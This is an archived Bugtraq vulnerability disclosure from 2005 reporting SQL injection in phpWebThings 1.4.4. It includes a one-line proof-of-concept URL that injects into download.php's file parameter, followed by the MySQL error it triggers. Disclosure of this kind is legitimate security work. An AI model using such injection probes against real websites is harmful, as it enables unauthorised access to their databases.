[41155] in bugtraq

home help back first fref pref prev next nref lref last post

SQL injection in phpWebThing 1.4.4

daemon@ATHENA.MIT.EDU (A.1.M@Hotmail.com)
Mon Nov 14 12:36:52 2005

Date: 11 Nov 2005 11:45:49 -0000
Message-ID: <20051111114549.5836.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: A.1.M@Hotmail.com
To: bugtraq@securityfocus.com

Vulnerable: phpWebThings 1.4.4
website : http://phpwebthings.org

The bug in download.php

ThE Exploit :

http://www.target.com/download.php?file=|SQL


ThE Error:

You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by date DESC' at line 1

AhLaM
http://www.lezr.com/vb
Best Regards ,,,

home help back first fref pref prev next nref lref last post